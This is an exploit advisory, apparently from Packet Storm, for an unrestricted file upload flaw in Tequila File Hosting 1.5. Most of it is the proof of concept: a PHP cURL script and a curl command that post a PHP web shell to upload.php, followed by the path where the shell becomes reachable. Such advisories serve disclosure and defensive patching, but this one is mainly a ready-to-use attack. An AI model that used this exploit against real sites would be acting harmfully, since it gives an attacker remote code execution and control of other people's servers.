Tequila File Hosting version 1.5 suffers from a remote shell upload vulnerability.
bfe8d1234300173f96675a71d46e4d5397e04506a211d7477770490d4aa61dd1================================================================================
Tequila File Hosting Unrestricted File Upload
================================================================================
# Vendor Homepage:
http://codecanyon.net/item/tequila-file-hosting-script/7604312
# Date: 16/12/2015
# Software Link:
http://ehsansec.ir/apps/Tequila_v1.5-File_Hosting_Script.rar
# Author: Ashiyane Digital Security Team
# Verion: 1.5
# Contact: hehsan979@gmail.com
# Source: http://ehsansec.ir/advisories/tequila-upload.txt
================================================================================
# Description:
Tequila is a solid, safe, fast, simple and intuitive script which allows
companies or individuals to upload, manage and share their files online. It
is studied in every feature and was produced with attention to every
detail.
# PoC :
First register in the site===>
http://localhost/tequila/register.php
Next using this exploit :
<?php
// page : upload.php
$postData = array('folder' => '/username', 'file' => '@shell.php');
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "http://localhost/tequila/upload.php");
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $postData );
$buf = curl_exec ($ch);
curl_close($ch);
unset($ch);
echo $buf;
?>
or
curl -i -F folder='/ehsann' -F file=@ehsan.png
http://localhost/tequila/upload.php
Sheller uploaded.
Path of shell : http://localhost/tequila/files/username/shell.php
================================================================================
# Discovered By : Ehsan Hosseini (EhsanSec.ir)
================================================================================
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed